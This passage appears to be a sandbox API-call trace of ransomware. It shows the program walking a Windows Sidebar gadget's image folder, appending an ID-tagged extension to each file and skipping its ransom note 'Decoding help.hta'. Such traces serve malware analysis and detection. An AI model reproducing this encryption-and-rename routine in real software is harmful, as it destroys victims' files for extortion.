Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*" [0059.041] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*") returned 77 [0059.041] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\", lpString2="add_down.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\add_down.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\add_down.png" [0059.041] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\add_down.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\add_down.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\add_down.png" [0059.041] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\add_down.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\add_down.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\add_down.png.[ID]g9uZrLhJaygpwRm1[ID]" [0059.041] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\add_down.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\images\\add_down.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\add_down.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\images\\add_down.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.415] FindNextFileW (in: hFindFile=0x5a5e70, lpFindFileData=0x293dfd30 | out: lpFindFileData=0x293dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbb63b834, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbb63b834, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbb69d3bc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x1a4, dwReserved0=0x0, dwReserved1=0x0, cFileName="add_over.png", cAlternateFileName="")) returned 1 [0059.415] lstrcpyW (in: lpString1=0x2ab190a0, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*" [0059.415] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*") returned 77 [0059.415] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\Decoding help.hta" [0059.415] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\images\\decoding help.hta")) returned 0x1 [0059.415] lstrcmpiW (lpString1="Decoding help.hta", lpString2="add_over.png") returned 1 [0059.415] lstrlenW (lpString="add_over.png") returned 12 [0059.415] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*" [0059.415] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*") returned 77 [0059.415] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\", lpString2="add_over.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\add_over.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\add_over.png" [0059.415] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\add_over.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\add_over.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\add_over.png" [0059.415] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\add_over.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\add_over.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\add_over.png.[ID]g9uZrLhJaygpwRm1[ID]" [0059.415] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\add_over.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\images\\add_over.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\add_over.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\images\\add_over.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.415] FindNextFileW (in: hFindFile=0x5a5e70, lpFindFileData=0x293dfd30 | out: lpFindFileData=0x293dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbb63b834, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbb63b834, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbb69d3bc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xe4, dwReserved0=0x0, dwReserved1=0x0, cFileName="add_up.png", cAlternateFileName="")) returned 1 [0059.415] lstrcpyW (in: lpString1=0x2ab190a0, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*" [0059.416] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*") returned 77 [0059.416] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\Decoding help.hta" [0059.416] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\images\\decoding help.hta")) returned 0x1 [0059.416] lstrcmpiW (lpString1="Decoding help.hta", lpString2="add_up.png") returned 1 [0059.416] lstrlenW (lpString="add_up.png") returned 10 [0059.416] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*" [0059.416] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*") returned 77 [0059.416] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\", lpString2="add_up.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\add_up.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\add_up.png" [0059.416] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\add_up.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\add_up.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\add_up.png" [0059.416] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\add_up.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\add_up.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\add_up.png.[ID]g9uZrLhJaygpwRm1[ID]" [0059.416] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\add_up.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\images\\add_up.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\add_up.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\images\\add_up.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0060.379] FindNextFileW (in: hFindFile=0x5a5e70, lpFindFileData=0x293dfd30 | out: lpFindFileData=0x293dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbb6156d5, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbb6156d5, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbb6c351c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x406b, dwReserved0=0x0, dwReserved1=0x0, cFileName="base-docked.png", cAlternateFileName="")) returned 1 [0060.379] lstrcpyW (in: lpString1=0x2528fe40, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*" [0060.379] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*") returned 77 [0060.379] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\Decoding help.hta" [0060.379] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\images\\decoding help.hta")) returned 0x1 [0060.379] lstrcmpiW (lpString1="Decoding help.hta", lpString2="base-docked.png") returned 1 [0060.379] lstrlenW (lpString="base-docked.png") returned 15 [0060.379] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*" [0060.379] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*") returned 77 [0060.379] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\", lpString2="base-docked.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\base-docked.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\base-docked.png" [0060.379] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\base-docked.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\base-docked.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\base-docked.png" [0060.379] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\base-docked.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\base-docked.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\base-docked.png.[ID]g9uZrLhJaygpwRm1[ID]" [0060.379] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\base-docked.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\images\\base-docked.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\base-docked.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\images\\base-docked.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0060.379] FindNextFileW (in: hFindFile=0x5a5e70, lpFindFileData=0x293dfd30 | out: lpFindFileData=0x293dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbb6c351c, ftCreationTime.dwHighDateTime=0x1c9ea13, ftLastAccessTime.dwLowDateTime=0xbb6c351c, ftLastAccessTime.dwHighDateTime=0x1c9ea13, ftLastWriteTime.dwLowDateTime=0xbb6c351c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xaa66, dwReserved0=0x0, dwReserved1=0x0, cFileName="base-undocked-2.png", cAlternateFileName="")) returned 1 [0060.379] lstrcpyW (in: lpString1=0x2528fe40, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*" [0060.380] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*") returned 77 [0060.380] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\Decoding help.hta" [0060.380] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\images\\decoding help.hta")) returned 0x1 [0060.380] lstrcmpiW (lpString1="Decoding help.hta", lpString2="base-undocked-2.png") returned 1 [0060.380] lstrlenW (lpString="base-undocked-2.png") returned 19 [0060.380] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*" [0060.380] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*") returned 77 [0060.380] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\", lpString2="base-undocked-2.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\base-undocked-2.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\base-undocked-2.png" [0060.380] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\base-undocked-2.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\base-undocked-2.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\base-undocked-2.png" [0060.380] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\base-undocked-2.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\base-undocked-2.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\base-undocked-2.png.[ID]g9uZrLhJaygpwRm1[ID]" [0060.380] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\base-undocked-2.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\images\\base-undocked-2.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\base-undocked-2.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\images\\base-undocked-2.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0060.380] FindNextFileW (in: hFindFile=0x5a5e70, lpFindFileData=0x293dfd30 | out: lpFindFileData=0x293dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbb5c9417, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbb5c9417, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbb6c351c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xd31a, dwReserved0=0x0, dwReserved1=0x0, cFileName="base-undocked-3.png", cAlternateFileName="")) returned 1 [0060.380] lstrcpyW (in: lpString1=0x2528fe40, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*" [0060.380] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*") returned 77 [0060.380] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\Decoding help.hta" [0060.380] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\images\\decoding help.hta")) returned 0x1 [0060.380] lstrcmpiW (lpString1="Decoding help.hta", lpString2="base-undocked-3.png") returned 1 [0060.380] lstrlenW (lpString="base-undocked-3.png") returned 19 [0060.380] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*" [0060.380] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*") returned 77 [0060.381] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\", lpString2="base-undocked-3.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\base-undocked-3.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\base-undocked-3.png" [0060.381] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\base-undocked-3.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\base-undocked-3.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\base-undocked-3.png" [0060.381] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\base-undocked-3.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\base-undocked-3.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\base-undocked-3.png.[ID]g9uZrLhJaygpwRm1[ID]" [0060.381] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\base-undocked-3.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\images\\base-undocked-3.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\base-undocked-3.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\images\\base-undocked-3.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0061.304] FindNextFileW (in: hFindFile=0x5a5e70, lpFindFileData=0x293dfd30 | out: lpFindFileData=0x293dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbb5ef576, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbb5ef576, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbb6e967c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xf240, dwReserved0=0x0, dwReserved1=0x0, cFileName="base-undocked-4.png", cAlternateFileName="")) returned 1 [0061.304] lstrcpyW (in: lpString1=0x10958800, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*" [0061.304] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*") returned 77 [0061.304] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\Decoding help.hta" [0061.304] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\images\\decoding help.hta")) returned 0x1 [0061.304] lstrcmpiW (lpString1="Decoding help.hta", lpString2="base-undocked-4.png") returned 1 [0061.304] lstrlenW (lpString="base-undocked-4.png") returned 19 [0061.304] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*" [0061.304] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*") returned 77 [0061.304] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\", lpString2="base-undocked-4.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\base-undocked-4.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\base-undocked-4.png" [0061.304] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\base-undocked-4.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\base-undocked-4.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\base-undocked-4.png" [0061.304] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\base-undocked-4.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\base-undocked-4.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\base-undocked-4.png.[ID]g9uZrLhJaygpwRm1[ID]" [0061.304] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files 